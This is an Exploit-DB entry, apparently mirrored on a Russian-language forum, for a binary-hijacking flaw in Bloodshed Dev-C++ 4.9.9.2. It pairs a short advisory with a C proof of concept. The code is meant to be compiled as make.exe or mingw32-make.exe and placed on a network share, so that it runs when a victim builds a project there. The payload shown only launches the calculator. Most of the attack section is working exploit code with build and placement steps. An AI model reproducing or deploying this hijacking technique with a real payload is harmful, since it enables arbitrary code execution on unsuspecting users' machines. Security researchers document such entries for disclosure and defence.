- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34532
- Проверка EDB
-
- Пройдено
- Автор
- STORM
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2010-08-25
Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Executions
C:
// source: https://www.securityfocus.com/bid/42737/info
Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.
/*
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
Date: August 25, 2010
Author: storm ([email protected])
Version: 4.9.9.2
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -o make.exe Dev-C++-Binary.c
gcc -o mingw32-make.exe Dev-C++-Binary.c
...and place in appropriate directory. Executes your code four times.
Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
*/
#include <windows.h>
int main()
{
WinExec("calc", 0);
exit(0);
return 0;
}- Источник
- www.exploit-db.com
